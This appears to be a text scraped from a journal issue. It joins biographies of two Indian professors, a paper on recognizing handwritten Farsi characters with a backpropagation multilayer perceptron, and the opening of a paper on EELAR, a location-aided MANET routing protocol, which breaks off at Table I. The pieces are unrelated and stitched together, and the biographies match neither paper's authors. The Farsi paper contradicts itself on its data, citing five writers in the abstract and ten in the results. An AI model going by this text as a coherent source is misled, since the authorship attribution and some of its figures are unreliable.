Suresh Jain completed his bachelor's degree in civil engineering from Maulana Azad National Institute of Technology (MANIT) (formerly Maulana Azad College of Technology), Bhopal, M.P., India, in 1986. He completed his master's degree in computer engineering from S.G. Institute of Technology and Science, Indore, in 1988, and his doctoral studies (Ph.D. in computer science) at Devi Ahilya University, Indore. He is a professor of computer engineering at the Institute of Engineering & Technology (IET), Devi Ahilya University, Indore, with over 21 years of experience in academics and research. His fields of study are grammatical inference, machine learning, web mining, and information retrieval. He has published more than 25 research papers and has authored a book.
R. S. Kasana completed his bachelor's degree in 1969 from Meerut University, Meerut, U.P., India. He completed his master's degree in Science (M.Sc., Physics) and his master's degree in technology (M.Tech., Applied Optics) at I.I.T. New Delhi, India. He completed his doctoral studies in Physics at Ujjain University in 1976, and post-doctoral studies at P.T.B. Braunschweig and Berlin, Germany, and at R.D. University, Jabalpur. He is a senior professor and Head of the Computer Science and Applications Department of Dr. H. S. Gour University, Sagar, M.P., India. During his tenure he has served as vice chancellor, Dean of the Science Faculty, and Chairman of the Board of Studies. He has more than 34 years of experience in academics and research; twelve Ph.D. degrees have been awarded under his supervision, and he has published more than 110 research articles/papers.
Handwritten Farsi Character Recognition using Artificial Neural Network

Reza Gharoie Ahangar
Master of Business Administration, Islamic Azad University, Babol Branch, and member of the Young Researchers Club, Iran
r.gharoie@gmail.com

Mohammad Farajpoor Ahangar
University of Medical Sciences of Babol, Iran, and member of the Young Researchers Club, Iran
fraj.ahangar@yahoo.com
Abstract—Neural networks have been used for character recognition for many years, but most of that work was confined to English characters. To date, very little work has been reported on handwritten Farsi character recognition. In this paper, we attempt to recognize handwritten Farsi characters using a multilayer perceptron (MLP) with one hidden layer, trained with the error backpropagation algorithm. In addition, an analysis was carried out to determine the number of hidden nodes that achieves high recognition performance. The system was trained using several different forms of handwriting provided by both male and female participants of different age groups; this training yields an automatic HCR system based on the MLP network. The experiments were carried out on two hundred fifty samples from five writers. The results show that MLP networks trained with the error backpropagation algorithm perform well in both recognition accuracy and memory usage, with the backpropagation network achieving a recognition accuracy of more than 80% on handwritten Farsi characters.

Key Words: Farsi character recognition, neural networks, multilayer perceptron (MLP), backpropagation algorithm.
I. INTRODUCTION

Handwritten character recognition is a difficult problem because of the great variation in writing styles and in the size and orientation of characters. Among the branches of handwritten character recognition, it is perhaps easier to recognize Persian alphabets and numerals than handwritten Farsi characters, and only a few attempts have been made in the past to address the recognition of handwritten Farsi characters [2]. Character recognition is an area of pattern recognition that has been the subject of considerable research over the last few decades. Many reports on character recognition for languages such as Chinese [7], Japanese, English [3, 14, 15], Arabic [10, 11], and Farsi [5] have been published, but recognition of handwritten Farsi characters using neural networks remains an open problem. Farsi is the first official language of Iran and is widely used across Iranian states; in many Iranian offices, such as passport, bank, sales-tax, railway, and embassy offices, the Farsi language is used. It is therefore of great importance to develop an automatic character recognition system for the Farsi language [5]. In this paper, we exploit neural networks for off-line Farsi handwriting recognition. Neural networks have been widely used in the field of handwriting recognition [6, 8]. The present work describes a system for offline recognition of Farsi script, a language widely spoken in Iran: we present an MLP network for handwritten Farsi character recognition and develop an automatic character recognition system using this network.
II. FARSI LANGUAGE

Farsi, an Iranian language, is one of the oldest languages in the world. The Farsi alphabet has 32 characters and is written from right to left. A set of handwritten Farsi characters is shown in Figure 1.

Figure 1. A set of handwritten Farsi characters [5]
III. PREPROCESSING

The handwritten character data samples were acquired from various students and faculty members, both male and female, of different age groups. Their handwriting was sampled on A4-size paper, scanned using a flat-bed scanner at a resolution of 100 dpi, and stored as 8-bit grey-scale images. Common operations performed prior to recognition are smoothing, thresholding, and skeletonization [2].
A. Image Smoothing

The task of smoothing is to remove unnecessary noise present in the image; spatial filters can be used for this. To reduce the effect of noise, the image is smoothed using a Gaussian filter [2].
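The smoothing step can be sketched as a small convolution. This is an illustrative sketch only: the paper says just "a Gaussian filter", so the 3x3 kernel size and integer weights below are assumptions.

```cpp
#include <vector>

// Smooth a grey-scale image with a 3x3 Gaussian approximation.
// The kernel (weights summing to 16) is an illustrative assumption;
// border pixels are left unchanged for simplicity.
std::vector<std::vector<int>> gaussianSmooth(const std::vector<std::vector<int>>& img) {
    static const int k[3][3] = {{1, 2, 1}, {2, 4, 2}, {1, 2, 1}};
    int h = (int)img.size(), w = (int)img[0].size();
    auto out = img;
    for (int r = 1; r + 1 < h; ++r)
        for (int c = 1; c + 1 < w; ++c) {
            int acc = 0;
            for (int dr = -1; dr <= 1; ++dr)
                for (int dc = -1; dc <= 1; ++dc)
                    acc += k[dr + 1][dc + 1] * img[r + dr][c + dc];
            out[r][c] = acc / 16;    // normalize by the kernel sum
        }
    return out;
}
```

A uniform region passes through unchanged, while isolated noise pixels are averaged into their neighbourhood.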
B. Skeletonization

We initialized the mouse in graphics mode so that a character can be written directly on screen. The skeletonization process was applied to the binary pixel image: extra pixels that do not belong to the backbone of the character were deleted, and broad strokes were reduced to thin lines. The skeletonization process is illustrated in Figure 2; a character before and after skeletonization is shown in Figures 2a and 2b, respectively [1].
C. Normalization

After skeletonization, we used a normalization process that normalized the character into a 30x30-pixel window, with the character shifted to the upper-left corner of the window. The final skeletonized and normalized character, shown in Figure 2c, was used as the input to the neural network. The skeletonization and normalization processes were applied to each character [1].

Figure 2. Skeletonization and normalization of a Farsi character [1]
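The shift-to-upper-left normalization can be sketched as follows. This is a minimal illustration assuming the character arrives as a binary grid; how an oversized character is handled is not specified in the paper, so it is simply clipped here.

```cpp
#include <vector>
#include <algorithm>

using Grid = std::vector<std::vector<int>>;

// Shift the character's bounding box to the upper-left corner of a
// 30x30 window, as described in Sec. III-C. Clipping oversized input
// is an assumption; the paper does not say whether characters are scaled.
Grid normalize30x30(const Grid& img) {
    int h = (int)img.size(), w = h ? (int)img[0].size() : 0;
    int top = h, left = w, bottom = -1, right = -1;
    for (int r = 0; r < h; ++r)                 // find the bounding box
        for (int c = 0; c < w; ++c)
            if (img[r][c]) {
                top = std::min(top, r);  left = std::min(left, c);
                bottom = std::max(bottom, r);  right = std::max(right, c);
            }
    Grid out(30, std::vector<int>(30, 0));
    if (bottom < 0) return out;                 // empty image: all zeros
    for (int r = top; r <= bottom && r - top < 30; ++r)
        for (int c = left; c <= right && c - left < 30; ++c)
            out[r - top][c - left] = img[r][c]; // copy shifted to (0,0)
    return out;
}
```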
IV. NEURAL NETWORK

A. Recognition

Recognition of handwritten letters is a very complex problem: letters can be written in different sizes, orientations, thicknesses, formats, and dimensions, which gives infinitely many variations. The capability of a neural network to generalize and to remain insensitive to missing data is very beneficial in recognizing handwritten letters. The proposed Farsi handwritten character recognition system uses a neural-network-based approach: a feed-forward multilayer perceptron (MLP) network with one hidden layer, trained using the backpropagation algorithm, is used to recognize handwritten Farsi characters [1, 2].
B. Structure Analysis of the Backpropagation Network

The recognition performance of a backpropagation network depends strongly on the structure of the network and on the training algorithm. In the proposed system, the backpropagation algorithm was selected to train the network; it has been shown to have a much better learning rate. The numbers of nodes in the input, hidden, and output layers determine the network structure. The best network structure is normally problem dependent, so a structure analysis has to be carried out to identify the optimum structure [2]. We used a multilayer perceptron trained with the error backpropagation (EBP) classification technique [1]; a brief description of this network is presented in this section.
C. Multilayer Perceptron Network

A multilayer perceptron network may be formed by simply cascading a group of single-layer perceptron networks; the output of one layer provides the input to the subsequent layer [16, 17]. The MLP network with the EBP algorithm has been applied to a wide variety of problems [1-17]. We used a two-layer perceptron, i.e., a single hidden layer and an output layer. The structure of the MLP network for Farsi character recognition is shown in Figure 3.

Figure 3. Multilayer perceptron network [1]
The activation function of a neuron j can be expressed as:

F_j(x) = 1 / (1 + e^(-net)),  where  net = Σ_i W_ij O_i    (1)

where O_i is the output of unit i and W_ij is the weight from unit i to unit j. The generalized delta rule algorithm [1, 16, 17] has been used to update the weights of the neural network in order to minimize the cost function:

E = ½ Σ_k (D_pk − O_pk)²    (2)

where D_pk and O_pk are the desired and actual values, respectively, of output unit k for training pair p. Convergence is achieved by updating the weights using the following formulas:

W_ij(n+1) = W_ij(n) + ΔW_ij(n)    (3)

ΔW_ij(n) = η δ_j X_i + α (W_ij(n) − W_ij(n−1))    (4)

where η is the learning rate, α is the momentum, W_ij(n) is the weight from hidden node i (or from an input) to node j at the nth iteration, X_i is either the output of unit i or an input, and δ_j is an error term for unit j. If unit j is an output unit, then

δ_j = O_j (1 − O_j)(D_j − O_j)    (5)

If unit j is an internal hidden unit, then

δ_j = O_j (1 − O_j) Σ_k δ_k W_kj    (6)
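Equations (1)-(6) can be sketched in C/C++ (the paper's implementation language) as one pattern presentation of the generalized delta rule. This is an illustrative sketch, not the authors' code: the `MLP` class layout and the constant 0.5 weight initialization are assumptions (real training would use small random weights).

```cpp
#include <cmath>
#include <vector>

// Single-hidden-layer MLP trained by error backpropagation with
// momentum, following Eqs. (1)-(6). eta/alpha are the values from Sec. V.
struct MLP {
    std::vector<std::vector<double>> wHid, wOut;          // wHid[j][i], wOut[k][j]
    std::vector<std::vector<double>> dHidPrev, dOutPrev;  // previous updates (momentum)
    double eta = 0.2, alpha = 0.1;

    MLP(size_t ni, size_t nh, size_t no)
        : wHid(nh, std::vector<double>(ni, 0.5)),   // constant init: assumption
          wOut(no, std::vector<double>(nh, 0.5)),
          dHidPrev(nh, std::vector<double>(ni, 0.0)),
          dOutPrev(no, std::vector<double>(nh, 0.0)) {}

    static double f(double net) { return 1.0 / (1.0 + std::exp(-net)); } // Eq. (1)

    std::vector<double> hidden(const std::vector<double>& x) const {
        std::vector<double> oh(wHid.size());
        for (size_t j = 0; j < wHid.size(); ++j) {
            double net = 0;
            for (size_t i = 0; i < x.size(); ++i) net += wHid[j][i] * x[i];
            oh[j] = f(net);
        }
        return oh;
    }

    std::vector<double> predict(const std::vector<double>& x) const {
        std::vector<double> oh = hidden(x), oo(wOut.size());
        for (size_t k = 0; k < wOut.size(); ++k) {
            double net = 0;
            for (size_t j = 0; j < oh.size(); ++j) net += wOut[k][j] * oh[j];
            oo[k] = f(net);
        }
        return oo;
    }

    // One pattern presentation: compute deltas (Eqs. 5-6), update weights (Eqs. 3-4).
    void train(const std::vector<double>& x, const std::vector<double>& d) {
        std::vector<double> oh = hidden(x), oo = predict(x);
        std::vector<double> dk(oo.size()), dj(oh.size());
        for (size_t k = 0; k < oo.size(); ++k)                     // Eq. (5)
            dk[k] = oo[k] * (1 - oo[k]) * (d[k] - oo[k]);
        for (size_t j = 0; j < oh.size(); ++j) {                   // Eq. (6)
            double s = 0;
            for (size_t k = 0; k < oo.size(); ++k) s += dk[k] * wOut[k][j];
            dj[j] = oh[j] * (1 - oh[j]) * s;
        }
        for (size_t k = 0; k < oo.size(); ++k)                     // Eqs. (3)-(4)
            for (size_t j = 0; j < oh.size(); ++j) {
                double dw = eta * dk[k] * oh[j] + alpha * dOutPrev[k][j];
                wOut[k][j] += dw;
                dOutPrev[k][j] = dw;
            }
        for (size_t j = 0; j < oh.size(); ++j)
            for (size_t i = 0; i < x.size(); ++i) {
                double dw = eta * dj[j] * x[i] + alpha * dHidPrev[j][i];
                wHid[j][i] += dw;
                dHidPrev[j][i] = dw;
            }
    }
};
```

Repeated presentations of a pattern drive the network output toward the desired code value, which is exactly the supervised procedure described in Section V.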
V. EXPERIMENTAL RESULTS

A. Character Database

We collected 250 samples of handwritten Farsi characters, written directly on screen by ten different persons, 25 samples each. We used 125 samples as training data (the training set) and the remaining 125 samples as test data (the test set).

B. Character Recognition with the MLPN

We implemented an automatic handwritten Farsi character recognition system using a multilayer perceptron (MLP) network in C/C++. The complete system is shown in Figure 4.
We initialized the mouse in graphics mode so that characters can be written directly on screen with the mouse. Once a character has been written on screen, it is converted into binary pixels. We then perform a normalization process that converts the binary character into 30x30 bits, and in the next step compress the 30x30 bits into 10x10 bits. After that, we apply the neural network classifier in order to recognize the Farsi character. We coded each Farsi character and trained the backpropagation neural network to reproduce the coded value, i.e., supervised learning. For example, the character (ۑ) has code 1, and the network is made to achieve this value by repeatedly modifying the weights. Each MLP network uses a two-layer feed-forward network [4] with nonlinear sigmoidal functions. Many experiments with various numbers of hidden units for each network were carried out. In this paper, we used one hidden layer with a flexible number of neurons and an output layer with 5 neurons, because we collected samples from (ۑ) to (الف). The network was trained using the EBP algorithm described in Section IV until the mean square error between the network output and the desired output fell below 0.05. The weights were updated after each pattern presentation. The learning rate and momentum were 0.2 and 0.1, respectively. The results are shown in Table 1.
Figure 4. A system for Farsi character recognition: handwritten character → conversion into pixels (1 or 0) → skeletonization and normalization (30x30 bits) → compression into 10x10 bits → MLPN classifier → recognized output.
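The 30x30-to-10x10 compression step in Figure 4 can be sketched as 3x3 block pooling. The paper does not specify the reduction rule, so the rule below (any set pixel in a 3x3 block marks the output cell, which preserves thin skeleton strokes) is an assumption.

```cpp
#include <vector>

// Compress a 30x30 binary grid into 10x10 bits: each output cell
// summarizes a 3x3 block of the input. The OR-style pooling rule is
// an assumption; the paper only states that 30x30 bits are compressed
// into 10x10 bits.
std::vector<std::vector<int>> compress10x10(const std::vector<std::vector<int>>& g) {
    std::vector<std::vector<int>> out(10, std::vector<int>(10, 0));
    for (int r = 0; r < 10; ++r)
        for (int c = 0; c < 10; ++c) {
            int ones = 0;
            for (int dr = 0; dr < 3; ++dr)          // scan the 3x3 block
                for (int dc = 0; dc < 3; ++dc)
                    ones += g[3 * r + dr][3 * c + dc];
            out[r][c] = ones > 0 ? 1 : 0;           // set if any pixel is set
        }
    return out;
}
```

The resulting 100 bits form the input vector of the MLP classifier.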
No. of hidden units | No. of iterations | Training time (s) | Recognition accuracy, training data (%) | Recognition accuracy, test data (%)
12                  | 200               | 1625              | 100                                     | 80
24                  | 200               | 3125              | 100                                     | 85
36                  | 200               | 4750              | 100                                     | 80

Table 1. Results of handwritten Farsi character recognition using the MLPN (input: 30x30 pixels)
The table shows the network's results for the different configurations. For MLP networks with 12, 24, and 36 neurons in the hidden layer, trained for an equal number of iterations, the prediction accuracies differ: the network with 24 hidden neurons achieves 85% on the test set, the most desirable result of the three.
VI. DISCUSSION

The results presented above show that 24 hidden units give the best performance on the training and test sets for the MLP network. MLP networks take longer to train because they use an iterative training algorithm such as EBP, but their classification time is short because it involves only simple dot-product calculations.

We should also point out that more neurons in the hidden layer is not, by itself, a better measure of network performance: as the results show, increasing the number of hidden-layer neurons brought no improvement in the network's response.
VII. CONCLUSION

In this paper, we have presented a system for recognizing handwritten Farsi characters. Experimental results show that the backpropagation network yields a good recognition accuracy of 85%.

The methods described here for Farsi handwritten character recognition can be extended to other Iranian scripts by including a few additional preprocessing steps. We have demonstrated the application of the MLP network to the handwritten Farsi character recognition problem; the skeletonized and normalized binary pixels of the Farsi characters were used as the inputs of the MLP network.

In further research, we would like to improve the network's recognition accuracy for Farsi characters by using more training samples written by one person and by using a good feature-extraction system. The training time may also be reduced by using a good feature-extraction technique: instead of using the global input, we may use feature inputs along with other neural network classifiers.
REFERENCES

[1] B. K. Verma, "Handwritten Hindi Character Recognition Using Multilayer Perceptron and Radial Basis Function Neural Networks," Proc. IEEE Int'l Conf. on Neural Networks, vol. 4, pp. 2111-2115, 1995.
[2] J. Sutha and N. Ramraj, "Neural Network Based Offline Tamil Handwritten Character Recognition System," Proc. IEEE Int'l Conf. on Computational Intelligence and Multimedia Applications, vol. 2, pp. 446-450, Dec. 2007.
[3] A. Rajavelu, M. T. Musavi, and M. V. Shirvaikar, "A Neural Network Approach to Character Recognition," Neural Networks, vol. 2, pp. 387-393, 1989.
[4] B. Verma, "New Training Methods for Multilayer Perceptrons," Ph.D. dissertation, Warsaw Univ. of Technology, Warsaw, Mar. 1995.
[5] B. Parhami and M. Taraghi, "Automatic Recognition of Printed Farsi Texts," Pattern Recognition, vol. 14, pp. 395-403, 1981.
[6] C. C. Tappert, C. Y. Suen, and T. Wakahara, "The State of the Art in On-Line Handwriting Recognition," IEEE Trans. Pattern Analysis and Machine Intelligence, vol. 12, no. 8, pp. 787-808, Aug. 1990.
[7] D. S. Yeung, "A Neural Network Recognition System for Handwritten Chinese Characters Using a Structure Approach," Proc. World Congress on Computational Intelligence, vol. 7, pp. 4353-4358, Orlando, USA, June 1994.
[8] D. Y. Lee, "Handwritten Digit Recognition Using K Nearest-Neighbor, Radial Basis Function, and Backpropagation Neural Networks," Neural Computation, vol. 3, pp. 440-449.
[9] E. Cohen, J. J. Hull, and S. N. Srihari, "Control Structure for Interpreting Handwritten Addresses," IEEE Trans. Pattern Analysis and Machine Intelligence, vol. 16, no. 10, pp. 1049-1055, Oct. 1994.
[10] H. Almuallim and S. Yamaguchi, "A Method of Recognition of Arabic Cursive Handwriting," IEEE Trans. Pattern Analysis and Machine Intelligence, vol. PAMI-9, no. 5, pp. 715-722, Sept. 1987.
[11] I. S. I. Abuhaiba and S. A. Mahmoud, "Recognition of Handwritten Cursive Arabic Characters," IEEE Trans. Pattern Analysis and Machine Intelligence, vol. 16, no. 6, pp. 664-672, June 1994.
[12] J. Hertz, A. Krogh, and R. G. Palmer, Introduction to the Theory of Neural Computation. Addison-Wesley, 1991.
[13] K. Yamada and H. Kami, "Handwritten Numeral Recognition by Multilayered Neural Network with Improved Learning Algorithm," Proc. IJCNN, Washington, D.C., vol. 2, pp. 259-266, 1989.
[14] P. Morasso, "Neural Models of Cursive Script Handwriting," Proc. IJCNN, Washington, D.C., vol. 2, pp. 539-542, June 1989.
[15] S. J. Smith and M. O. Bourgoin, "Handwritten Character Classification Using Nearest Neighbor in Large Databases," IEEE Trans. Pattern Analysis and Machine Intelligence, vol. 16, no. 10, pp. 915-919, Oct. 1994.
[16] P. D. Wasserman, Neural Computing: Theory and Practice. Van Nostrand Reinhold, 1989.
[17] S. Rajasekaran and G. A. Vijayalakshmi Pai, Neural Networks, Fuzzy Logic, and Genetic Algorithms. Prentice-Hall of India.
Energy Efficient Location Aided Routing Protocol for Wireless MANETs

Mohammad A. Mikki
Computer Engineering Department, IUG, Gaza, Palestine
mmikki@iugaza.edu.ps
Abstract—A Mobile Ad-Hoc Network (MANET) is a collection of wireless mobile nodes forming a temporary network without any centralized access point, infrastructure, or centralized administration. In this paper we introduce an Energy Efficient Location Aided Routing (EELAR) protocol for MANETs that is based on Location Aided Routing (LAR). EELAR significantly reduces the energy consumption of the mobile nodes' batteries by limiting the area in which a new route is discovered to a smaller zone; thus, control packet overhead is significantly reduced. In EELAR a reference wireless base station is used, and the network's circular area centered at the base station is divided into six equal sub-areas. At route discovery, instead of flooding control packets over the whole network area, they are flooded only over the sub-area of the destination mobile node. The base station stores the locations of the mobile nodes in a position table. To show the efficiency of the proposed protocol we present simulations using NS-2. Simulation results show that EELAR improves control packet overhead and delivery ratio compared to the AODV, LAR, and DSR protocols.

Keywords: Location Aided Routing, MANET, mobile nodes, route discovery, control packet overhead
I. INTRODUCTION

A mobile ad hoc network (MANET) consists of a group of mobile nodes (MNs) that communicate with each other without the presence of infrastructure. MANETs are used in disaster recovery, rescue operations, military communication, and many other applications. In order to provide communication throughout the network, the mobile nodes must cooperate to handle network functions, such as packet routing. The wireless mobile hosts communicate in a multi-hop fashion. In multi-hop wireless ad-hoc networks, designing energy-efficient routing protocols is critical, since nodes have very limited energy, computing power, and communication capabilities. For such protocols to scale to larger ad-hoc networks, localized algorithms that depend entirely on local information need to be proposed. The key design challenge is to derive the required global properties from these localized algorithms.
In ad hoc networks, routing protocols are divided into three categories: proactive, reactive, and hybrid. In proactive routing protocols, each MN maintains a routing table, and control packets are broadcast periodically within the whole network. This means that routes to destination MNs are computed at regular intervals, before the connection from source to destination is established. When a source MN wants to send data to a destination MN, it searches the routing table for a destination match. The advantage of this method is that the route is already known; the disadvantage is that the control packet overhead is large, since control packets are sent periodically to maintain all routes even though not all routes will necessarily be used. Thus, the limited network bandwidth is consumed by control overhead. An example of a proactive routing protocol is DSDV [9].
In reactive routing protocols, routes are discovered only when the source MN needs to transmit data packets; control packets are broadcast only when there are data to be transmitted, so the broadcast overhead is reduced. These protocols establish routes to a destination in two phases: route discovery and route maintenance. Since an ad hoc network is by nature highly mobile, the network topology changes often; when the route to a destination breaks, the route maintenance phase starts in order to keep a route available. This method suffers from a large end-to-end delay in large networks, because a route must be available before data packets can be sent. An example of a reactive routing protocol is DSR [5].
Hybrid routing protocols combine the advantages of both proactive and reactive protocols. Each MN defines two zones: the inside zone and the outside zone. Each node maintains a neighbor table covering MNs up to n hops away; these MNs are considered to be in the node's inside zone. Hybrid protocols thus act as proactive protocols in the inside zone and as reactive protocols in the outside zone. Each node periodically broadcasts control packets in the inside zone to build a routing table for all MNs in the inside zone. When a node wishes to send data to a destination node that resides in the outside zone, it uses a reactive protocol: a route discovery phase is invoked to establish the route to the destination MN. An example of a hybrid routing protocol is ZRP [14].
When a routing protocol does not use the location information of the mobile nodes, the routing is topology-based; if position information is used, the routing is position-based [15], [16]. There are two methods of forwarding data packets in position-based routing: greedy forwarding and directional flooding [23]. In greedy forwarding, the next-hop node is the one closest in distance to the destination; the Greedy Perimeter Stateless Routing (GPSR) protocol uses greedy forwarding [6]. In directional flooding [19], the source node floods data packets into a geographical area in the direction of the destination node; Location Aided Routing (LAR) uses directional flooding [1], [19].
In position-based routing protocols, an MN uses a directional antenna or a GPS receiver to estimate its (x, y) position. If GPS is used, every node knows its (x, y) position, assuming z = 0. Fig. 1 shows two mobile nodes whose positions, (x1, y1) and (x2, y2), are determined using GPS. The distance d between the two MNs is calculated using (1), and the angle θ, defined as shown in Fig. 1, is calculated using (2):

d = sqrt((x2 − x1)² + (y2 − y1)²)    (1)

θ = tan⁻¹((y2 − y1) / (x2 − x1))    (2)

When directional antennas are used, the distance between two MNs and the Angle of Arrival (AoA) are estimated from the received signal: the signal strength is used to estimate the distance between the two nodes, and the estimate of θ is obtained from the AoA [12], [13].
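Equations (1) and (2) translate directly into code. The function names are illustrative; `std::atan2` is used in place of a bare arctangent so that the quadrant of θ is resolved correctly.

```cpp
#include <cmath>

// Distance between two GPS-positioned nodes, Eq. (1).
double nodeDistance(double x1, double y1, double x2, double y2) {
    return std::sqrt((x2 - x1) * (x2 - x1) + (y2 - y1) * (y2 - y1));
}

// Bearing angle theta of node 2 as seen from node 1, Eq. (2).
// atan2 handles the (x2 - x1) == 0 case and picks the right quadrant.
double nodeAngle(double x1, double y1, double x2, double y2) {
    return std::atan2(y2 - y1, x2 - x1);
}
```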
The rest of the paper is organized as follows: Section II presents related work; Section III presents the EELAR approach; Section IV validates the proposed approach; and Section V concludes the paper.
II. RELATED WORK

In this section we present some of the most important routing protocols used in wireless mobile ad hoc networks.

Figure 1. Position-based routing protocol that uses GPS to determine the mobile nodes' (x, y) positions
The Dynamic Source Routing (DSR) protocol is a simple and efficient routing protocol designed specifically for use in multi-hop wireless ad hoc networks of mobile nodes. DSR allows the network to be completely self-organizing and self-configuring, without the need for any existing network infrastructure or administration. The protocol is composed of two mechanisms, route discovery and route maintenance, which work together to allow nodes to discover and maintain source routes to arbitrary destinations in the ad hoc network [5]. The DSR protocol is triggered by a packet generated at the sending node for a destination node whose IP address is (or can be) known to the sending node. When a node has a packet to send to a destination, it first checks its cache to see whether a path to the destination is already known; if no path is available, the route discovery mechanism is initiated. Route discovery allows any host in the ad hoc network to dynamically discover a route to any other host in the ad hoc network. The route maintenance procedure monitors the operation of the routes and informs the sender of any routing errors. Route maintenance is required by all routing protocols, especially those for MANETs, because of the very high probability of routes being lost [11]. The use of source routing allows packet routing to be trivially loop-free, avoids the need for up-to-date routing information in the intermediate nodes through which packets are forwarded, and allows nodes forwarding or overhearing packets to cache the routing information in them for their own future use. All aspects of the protocol operate entirely on demand, allowing the routing packet overhead of DSR to scale automatically to only what is needed to react to changes in the routes currently in use [17].
The Multipoint Relays (MPR) technique efficiently performs the flooding function in wireless networks. It reduces the number of redundant retransmissions while diffusing a flooding packet throughout the entire network. Each node N in the network selects some of its neighbors as its multipoint relays (MPRs), and only these neighbors retransmit the flooding packets broadcast by node N. Nodes whose distance from N is 2 hops are called 2-hop neighbors. The MPR selection algorithm should guarantee that the flooding packets from N are received by all of N's 2-hop neighbors after the rebroadcast by N's MPRs.
The Location-Aided Routing (LAR) protocol is an approach that decreases the overhead of route discovery by utilizing location information of mobile hosts; such location information may be obtained using the global positioning system (GPS) [1], [6], [7], [8], [19]. LAR uses two flooding regions, the forwarded region and the expected region, and uses location information to reduce the search space for a desired route; limiting the search space results in fewer route discovery messages [1], [19]. When a source node wants to send data packets to a destination, it first obtains the position of the destination mobile node by contacting a location service that is responsible for mobile node positions; this causes connection and tracking problems [8], [10]. Two different LAR algorithms have been presented in [19]: LAR scheme 1 and LAR scheme 2. LAR scheme 1 uses the expected location of the destination (the so-called expected zone) at the time of route discovery in order to determine the request zone. The request zone used in LAR scheme 1 is the smallest rectangle including the current location of the source and the expected zone of the destination, with its sides parallel to the X and Y axes. When a source initiates route discovery for a destination, it includes the four corners of the request zone in the transmitted route request message. Any intermediate node receiving the route request then decides whether to forward it, using this explicitly specified request zone; note that in basic LAR scheme 1 the request zone is not modified by intermediate nodes. LAR scheme 2, on the other hand, uses the distance from the destination's previous location as a parameter defining the request zone: any intermediate node J receiving the route request forwards it if J is closer to, or not much farther from, the destination's previous location than node I that transmitted the request packet to J. The implicit request zone of LAR scheme 2 therefore adapts as the route request packet propagates to various nodes.
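LAR scheme 1's forwarding decision can be sketched as follows, modelling the expected zone as a circle of radius r around the destination's last known position (as in [19]) and the request zone as the smallest axis-parallel rectangle covering the source and that circle. The `Rect` helper is illustrative.

```cpp
#include <algorithm>

struct Rect { double xmin, ymin, xmax, ymax; };

// Smallest axis-parallel rectangle containing the source (sx, sy) and
// the expected zone: a circle of radius r around the destination's
// last known position (dx, dy).
Rect requestZone(double sx, double sy, double dx, double dy, double r) {
    Rect z;
    z.xmin = std::min(sx, dx - r);  z.xmax = std::max(sx, dx + r);
    z.ymin = std::min(sy, dy - r);  z.ymax = std::max(sy, dy + r);
    return z;
}

// An intermediate node rebroadcasts the route request only if its own
// position lies inside the request zone carried in the request.
bool shouldForward(const Rect& z, double x, double y) {
    return x >= z.xmin && x <= z.xmax && y >= z.ymin && y <= z.ymax;
}
```

Nodes outside the rectangle simply drop the request, which is exactly how limiting the search space reduces the number of route discovery messages.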
The AODV [22] protocol is a distance-vector routing protocol that operates on demand. There are no periodic routing table exchanges; routes are only set up when a node wants to communicate with some other node. Only nodes that lie on the path between the two end nodes keep information about the route. When a node wishes to communicate with a destination node for which it has no routing information, it initiates route discovery. The aim of route discovery is to set up a bidirectional route from the source to the destination. Route discovery works by flooding the network with route request (RREQ) packets. Each node that receives the RREQ looks in its routing table to see if it is the destination or if it has a fresh enough route to the destination. If it does, it sends a unicast route reply (RREP) message back to the source; otherwise, it rebroadcasts the RREQ. The RREP is routed back on a temporary reverse route that was created by the RREQ. Each node keeps track of its local connectivity, i.e., its neighbors. This is performed either by periodic exchange of HELLO messages or by feedback from the link layer upon unsuccessful transmission. If a route in the ad hoc network is broken, some node along this route will detect that the next-hop router is unreachable based on its local connectivity management. If this node has any active neighbors that depend on the broken link, it will propagate route error (RERR) messages to all of them. A node that receives a RERR performs the same check and, if necessary, propagates the RERR further in order to inform all concerned nodes.
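The RREQ handling decision described above can be sketched roughly as follows. This is a simplification for illustration only (the field names and the dictionary-based routing table are our assumptions, not the actual AODV packet layout); "fresh enough" is modeled by comparing destination sequence numbers:

```python
def handle_rreq(node_addr, routing_table, rreq):
    """Decide how a node reacts to an incoming AODV-style RREQ.

    routing_table maps destination -> destination sequence number of
    the cached route; rreq is a dict with 'dest' and 'dest_seq' keys.
    """
    if node_addr == rreq["dest"]:
        return "send RREP"          # this node is the destination
    cached_seq = routing_table.get(rreq["dest"])
    if cached_seq is not None and cached_seq >= rreq["dest_seq"]:
        return "send RREP"          # cached route is fresh enough
    return "rebroadcast RREQ"       # keep flooding the request
```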
III. ENERGY EFFICIENT LOCATION AIDED ROUTING PROTOCOL APPROACH
This section presents our proposed Energy Efficient Location Aided Routing (EELAR) protocol. The proposed protocol is a modification of the ad hoc routing protocol LAR [1], [19]. EELAR utilizes location information of mobile nodes with the goal of decreasing routing-related overhead in mobile ad hoc networks. It uses the location information of the mobile nodes to limit the search for a new route to a smaller area of the ad hoc network, which results in a significant reduction in the number of routing messages; therefore, the energy consumption of the mobile nodes' batteries is decreased significantly. In order to reduce the control overhead caused by broadcast storms when control packets are flooded into the whole network (as in the DSR protocol, for example), EELAR uses a wireless base station (BS) that covers all MNs in the network. The BS divides the network into six areas as shown in Fig. 2.

In order for the BS to efficiently route packets among MNs, it keeps a Position Table (PT) that stores the locations of all MNs. The PT is built by the BS by broadcasting small BEACON packets to all MNs in the network. MN positions are estimated using directional antennas: the distance between an MN and the BS is estimated using the strength of the signal from the MN to the BS, and the angle of arrival (AoA) θ, the angle of the mobile node from which the packet arrives at the BS, is estimated using the directional antenna of the MN. Based on the AoA, the BS can determine the network area in which each MN is located. Table I shows how θ determines the area ID of each MN. When a source MN needs to transmit data, it first queries the BS for the area ID of the destination MN; data packets are then flooded into that area only. Using the location information of the destination mobile node limits the search for a new route to one of the six areas of the ad hoc network.
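The paper does not specify how distance is derived from signal strength. One common choice is the log-distance path-loss model, sketched here under that assumption; the function name, default path-loss exponent, and reference distance are all illustrative, not values from the paper:

```python
def distance_from_rssi(rssi_dbm, ref_power_dbm=0.0,
                       ref_distance_m=1.0, path_loss_exp=2.7):
    """Estimate MN-to-BS distance from received signal strength using
    the log-distance path-loss model:
        PL(d) = PL(d0) + 10 * n * log10(d / d0)
    ref_power_dbm is the received power at the reference distance d0."""
    exponent = (ref_power_dbm - rssi_dbm) / (10 * path_loss_exp)
    return ref_distance_m * 10 ** exponent
```

With a path-loss exponent of 2.7, a signal 27 dB below the 1 m reference power corresponds to a distance of about 10 m.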
Figure 2. The definition of the six areas in EELAR
TABLE I. THE DEFINITION OF THE SIX NETWORK AREAS IN EELAR BASED ON θ

